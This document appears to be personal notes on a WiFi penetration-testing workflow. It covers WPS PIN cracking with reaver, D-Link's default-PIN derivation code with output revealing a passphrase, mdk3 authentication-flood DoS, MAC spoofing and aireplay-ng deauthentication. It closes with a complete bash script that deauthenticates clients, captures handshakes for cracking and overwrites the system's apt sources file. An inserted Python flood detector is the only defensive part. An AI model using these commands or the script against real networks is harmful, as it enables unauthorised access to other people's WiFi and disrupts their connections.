WiFi penetration testing workflow notes

Pulled these together here so I can refer back to them later.

0x00 Flowchart


0x01 Get the BSSID and ESSID

reference:
https://www.aircrack-ng.org/documentation.html


0x02 Detect whether WPS (Wi-Fi Protected Setup) is enabled

command: airodump-ng (check the MB column), wash -i mon0 -C

54e. : WPS enabled by default; 54e : WPS not enabled by default
When we set a complex password for a WiFi network, every new device has to type that password in again, which is a bit tedious. WPS was introduced to solve this problem.
It provides an 8-digit, purely numeric key; once the key is authenticated the device is connected to the WiFi.
But these 8 digits are verified in two parts: the first 4 digits are checked first, then digits 5-7, so at most 11000-1 brute-force attempts are needed to succeed.
On a few routers WPS is controlled by a physical button; with physical access to the router it can be switched on manually.

reference:
http://www.howtogeek.com/176124/wi-fi-protected-setup-wps-is-insecure-heres-why-you-should-disable-it/


0x03 Probe the PIN

command: reaver -i mon0 -b ap_bssid -vv

1: AP denial of service

When the router stops responding, a DoS attack can be used to knock the AP offline so that the victim reboots the router.
The common choice is the authentication flood attack: the attacker forges the source MAC address (the 802.11 frame transmission mechanism allows this) and sends authentication requests to the target AP; repeating these requests eventually exhausts the AP's memory and causes denial of service.

command:mdk3 a mon0 -a bssid -c

reference:
https://www.sans.org/reading-room/whitepapers/wireless/80211-denial-service-attacks-mitigation-2108
http://tools.kali.org/wireless-attacks/mdk3
http://xiao106347.blog.163.com/blog/static/215992078201425920197

2: Get the password

reference:
http://tools.kali.org/wireless-attacks/reaver
http://null-byte.wonderhowto.com/how-to/hack-wpa-wifi-passwords-by-cracking-wps-pin-0132542/
https://www.pwnieexpress.com/blog/wps-cracking-with-reaver
http://lifehacker.com/5873407/how-to-crack-a-wi-fi-networks-wpa-password-with-reaver


0x04 Obtain the PIN directly from a flaw in the generation algorithm

The author of devttys0 reverse-engineered the WPS PIN generation algorithms in D-Link and Belkin firmware and can derive the default PIN directly.
Taking D-Link as an example: take the AP's BSSID, split it, and apply XOR, AND and shift operations to produce the PIN. The pseudo-C code is as follows:

unsigned int generate_default_pin(char *buf)
{
    char *mac;
    char mac_address[32] = { 0 };
    unsigned int oui, nic, pin;

    /* Get a pointer to the WAN MAC address */
    mac = lockAndGetInfo_log()->wan_mac_address;

    /*
     * Create a local, NULL-terminated copy of the WAN MAC (simplified from
     * the original code's sprintf/memmove loop).
     */
    sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0],
                                                     mac[1],
                                                     mac[2],
                                                     mac[3],
                                                     mac[4],
                                                     mac[5],
                                                     mac[6],
                                                     mac[7],
                                                     mac[8],
                                                     mac[9],
                                                     mac[10],
                                                     mac[11]);

    /*
     * Convert the OUI and NIC portions of the MAC address to integer values.
     * OUI is unused, just need the NIC.
     */
    sscanf(mac_address, "%06X%06X", &oui, &nic);

    /* Do some XOR munging of the NIC. */
    pin = (nic ^ 0x55AA55);
    pin = pin ^ (((pin & 0x0F) << 4) +
                 ((pin & 0x0F) << 8) +
                 ((pin & 0x0F) << 12) +
                 ((pin & 0x0F) << 16) +
                 ((pin & 0x0F) << 20));

    /*
     * The largest possible remainder for any value divided by 10,000,000
     * is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0.
     */
    pin = pin % 10000000;

    /* The pin needs to be at least 7 digits long */
    if(pin < 1000000)
    {
        /*
         * The largest possible remainder for any value divided by 9 is
         * 8; hence this adds at most 9,000,000 to the pin value, and at
         * least 1,000,000. This guarantees that the pin will be 7 digits
         * long, and also means that it won't start with a 0.
         */
        pin += ((pin % 9) * 1000000) + 1000000;
    }

    /*
     * The final 8 digit pin is the 7 digit value just computed, plus a
     * checksum digit. Note that in the disassembly, the wps_pin_checksum
     * function is inlined (it's just the standard WPS checksum implementation).
     */
    pin = ((pin * 10) + wps_pin_checksum(pin));

    sprintf(buf, "%08d", pin);
    return pin;
}

$ sudo airodump-ng mon0 -c 4

 CH  4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

C0:A0:BB:EF:B3:D6  -13   0        6        0    0   4  54e  WPA2 CCMP   PSK  dlink-B3D6

$ ./pingen C0:A0:BB:EF:B3:D7   # <--- WAN MAC is BSSID+1
Default Pin: 99767389

$ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from C0:A0:BB:EF:B3:D6
[+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6)
[+] WPS PIN: '99767389'
[+] WPA PSK: 'hluig79268'
[+] AP SSID: 'dlink-B3D6'

reference:
http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/
http://www.devttys0.com/2015/04/reversing-belkins-wps-pin-algorithm/


0x05 Passwords shared through WiFi-sharing apps

zke1ev3n reverse-engineered the WiFi Master Key (万能钥匙) app and found that the AP-related information it sends is AES-encrypted, with both the key and the IV hard-coded in the program. The device fingerprint goes in the sign field as md5(device fingerprint + salt), with the salt also hard-coded in the program; this value serves as the signature used to check whether a request is legitimate.
The response is AES-encrypted as well, with the same key and IV.
http://www.wifi4.cn implements this encryption flow.

reference:
http://zke1ev3n.me/2016/04/06/WiFi%E4%B8%87%E8%83%BD%E9%92%A5%E5%8C%99%E6%8E%A5%E5%8F%A3%E5%8D%8F%E8%AE%AE%E7%A0%B4%E8%A7%A3/
https://github.com/Zke1ev3n/WiFiMaster/blob/master/WiFiMaster.py


0x06 MAC whitelist restrictions

The MAC address is burned into the NIC's EEPROM; each time the NIC initializes it reads the MAC address from the EEPROM and writes it into a buffer (on Windows, into the registry).
When sending frames, the relevant APIs read the MAC address from that buffer rather than from the EEPROM.

command:

1. airodump-ng mon0 (get the MAC (bssid) of a client already connected to the AP)
2. ifconfig wlan0 hw ether 00:01:02:03:04:05

reference:
https://en.wikipedia.org/wiki/MAC_spoofing
https://collegetimes.co/change-mac-address/
http://xiao106347.blog.163.com/blog/static/21599207820131014101844104/


0x07 Capture the handshake

1. airodump-ng -w /tmp/test.cap -c channelNum --bssid apmac mon0
2. deauth client

Wi-Fi deauthentication attack

The IEEE 802.11 protocol includes a deauthentication frame, used to terminate the authentication between server and client.
The attacker only needs to know the client's MAC (bssid); because of the frame transmission mechanism, the MAC can be forged and a deauthentication request sent to the AP at any time.
If the attack is sustained, the target client cannot connect to the AP. At that point a Pineapple can be brought in to set up a fake AP and get ready to sniff.

command: aireplay-ng -0 <attack count> -a apmac -c clientmac -x <packet rate> mon1

reference:
https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack
https://www.sans.org/reading-room/whitepapers/wireless/80211-denial-service-attacks-mitigation-2108


3. get handshake
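From the defender's side, the authentication flood in 0x03 and the deauthentication burst described in this section both stand out in a management-frame log. The detector below is an added example, not part of the original notes; the (timestamp, subtype, src, bssid) record format, the thresholds and the sample traffic are all constructed assumptions.

```python
from collections import defaultdict, deque

DEAUTH_PER_SEC = 10     # assumption: a legitimate AP rarely sends 10+ deauths in one second
AUTH_SRCS_PER_SEC = 20  # assumption: 20+ distinct client MACs authenticating in one second is a flood
WINDOW = 1.0            # sliding window in seconds

def detect_floods(frames, window=WINDOW):
    """frames: (timestamp_s, subtype, src_mac, bssid) sorted by time.
    Returns alerts as (kind, bssid, timestamp), at most once per kind and BSSID."""
    alerts = []
    deauth_win = defaultdict(deque)   # bssid -> timestamps of recent deauth frames
    auth_win = defaultdict(deque)     # bssid -> (timestamp, src) of recent auth requests
    fired = set()
    for ts, subtype, src, bssid in frames:
        if subtype == "deauth":
            q = deauth_win[bssid]
            q.append(ts)
            while q and ts - q[0] > window:   # drop frames older than the window
                q.popleft()
            if len(q) >= DEAUTH_PER_SEC and ("deauth", bssid) not in fired:
                alerts.append(("deauth_flood", bssid, ts))
                fired.add(("deauth", bssid))
        elif subtype == "auth":
            q = auth_win[bssid]
            q.append((ts, src))
            while q and ts - q[0][0] > window:
                q.popleft()
            # a flood with forged source MACs shows up as many distinct sources, not one noisy client
            if len({s for _, s in q}) >= AUTH_SRCS_PER_SEC and ("auth", bssid) not in fired:
                alerts.append(("auth_flood", bssid, ts))
                fired.add(("auth", bssid))
    return alerts

def sample_frames():
    """Constructed traffic: one normal client authentication and one AP-initiated deauth,
    then an authentication flood with 25 forged source MACs, then a 12-frame deauth burst."""
    ap = "c0:a0:bb:ef:b3:d6"   # BSSID reused from the airodump-ng output in 0x04
    frames = [(0.0, "auth", "aa:bb:cc:00:00:01", ap), (0.5, "deauth", ap, ap)]
    frames += [(1.0 + i * 0.01, "auth", f"02:00:00:00:{i:02x}:00", ap) for i in range(25)]
    frames += [(5.0 + i * 0.02, "deauth", ap, ap) for i in range(12)]
    return frames

if __name__ == "__main__":
    for kind, bssid, ts in detect_floods(sample_frames()):
        print(f"[!] {kind} against {bssid} at t={ts:.2f}s")
```

The isolated deauth at t=0.5 and the single client authentication raise nothing; only the bursts cross the thresholds.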


0x08 autoGetHandshakePackage Script

#!/bin/bash
# this script automatically captures a wifi handshake package
# os : debian
# date: 2016/11/08 14:05:05 CST


function onExit(){
    # print first: killing our own PID before the echo meant the message never appeared
    echo "[*] you hit ctrl+c or killed $$. now exiting..."
    ps xua | grep airodump-ng | grep -v grep | awk '{print $2}' | xargs kill -9
    exit 1
}

function helpDoc(){
    echo "#-------------------------------------------------------"
    echo "[+] usage:   ./autoGetHandshake.sh <interface> <ap_name>"
    echo "[-] example: ./autoGetHandshake.sh wlan0 tp_link1422"
    echo "[-]          ./autoGetHandshake.sh moresec tp_link1422"
    echo "[-] interface default choice first network card. set interface=\"moresec\""
    echo "#-------------------------------------------------------"
    exit 0
}

function setAirPath(){

    airmonPath=$(which airmon-ng)
    airodumpPath=$(which airodump-ng)
    aireplayPath=$(which aireplay-ng)
    aircrackPath=$(which aircrack-ng)
}

function deauthAttackAndGetHandshake(){

    (
        ${airodumpPath} wlan0mon --bssid $1 -c $2 -w pr0mise --output-format cap
    ) &

    sleep 30

    for ((i=0;i<3;i++))
    do
        ${aireplayPath} -0 5 -a $1 wlan0mon
        sleep 3

    done
    currentBssid=$1
    #return

}


#-----------------------------------------------------------

trap onExit SIGQUIT INT

verifySourcePackgeExist="wireless"
airmonPath=""
aireplayPath=""
airodumpPath=""
aircrackPath=""

case $1 in 

    ""|h*|-h*|--help ) 
        helpDoc;;
        #break;;
esac
if [ -z "$2" ]; then helpDoc ; fi


# "[ ! -e $(which ...) ]" is always false when which prints nothing, so test the command directly
if ! command -v aircrack-ng >/dev/null 2>&1
then
    echo "[+] file not exist"
    verifySourcePackgeExist=$(apt-cache search aircrack-ng | head -n 1 | grep $verifySourcePackgeExist)
    echo "[-] "$verifySourcePackgeExist

    if [ -z "$verifySourcePackgeExist" ]
    then 
        echo "deb http://mirrors.aliyun.com/kali sana main non-free contrib" | tee /etc/apt/sources.list
        echo "deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free" | tee -a /etc/apt/sources.list
        echo "deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free" | tee -a /etc/apt/sources.list
        echo "[-] aliyun mirror into /etc/apt/sources."
        apt-get update

    fi
    apt-get install -y aircrack-ng
    updatedb
else 
    echo "[+] aircrack-ng already exist"
fi

setAirPath

#-----------------------------------------------------------

if [[ -z $(ifconfig|grep wlan0mon) ]]
then

    #default choice first net card
    if [[ "$1" = "moresec" ]]
    then
        interfaceName=$(cat /proc/net/wireless | awk 'NR==3 {if(/:/)gsub(/:/,""); print $1}')
        if [ -z "$interfaceName" ]
        then
            echo "[+] wireless not found. please try exec (/etc/init.d/networking restart && /etc/init.d/network-manager restart)"
            echo "[+] if the solution is not beautiful...maybe... reboot?"
            exit 0 
        fi

    else
        interfaceName=$1
    fi


    echo "[*] interface name is $interfaceName"

    ${airmonPath} check kill
    echo "[*] exec(airmon check kill)"

    ${airmonPath} start $interfaceName
    echo "[+] wireless net card ($interfaceName) state is LISTENING"

else
    echo "[+] wlan0mon already ESTABLISHED"
fi

#-----------------------------------------------------------


apName=$2

(
    (
        ${airodumpPath} wlan0mon -w temp --output-format csv
    ) &

    sleep 10
    ps xua | grep airodump-ng | grep -v grep | awk '{print $2}' | xargs kill

)

echo "[+] kill airodump-ng process successful"

#-----------------------------------------------------------

# get bssid and channel

# gsub/grep/sub  etc.
# test=" moresec"
# gsub(/\s/,"",$test) => "moreec"  
# eliminate 's' and ' ' character. yikesaiting
# multiple escape. 
# so . correct : gsub(/\\s/,"",$test) => "moresec"


bssid=""
channel=0

verifyCsvExistApName=$(awk -F ',' '{print $14}' temp*.csv |awk '{gsub(/\\s/,"");print $1}' | grep ${apName}|wc -l)
echo $verifyCsvExistApName


if [[ $verifyCsvExistApName -ge 1 ]]
then

    echo "[+] get bssid,channel"
    deauthAttackAndGetHandshake $(awk -F ',' '{sub(/^ /,"",$14);if($14=="'${apName}'") print $1,$4}' temp*.csv)
    #if($14=="${apName}") -> awk parse -> if($14=="")
    ps xua | grep airodump-ng | grep -v grep | awk '{print $2}' | xargs kill -9


else
    echo "[+] ap_name not found. please recapture handshake package"
    exit 0
fi


#-----------------------------------------------------------

rm temp*.csv
mv pr0mise*.cap ${apName}_${currentBssid}.cap
${aircrackPath} ${apName}_${currentBssid}.cap -J ${apName}_${currentBssid}

clear
echo "[+] over. good luck."

exit 0

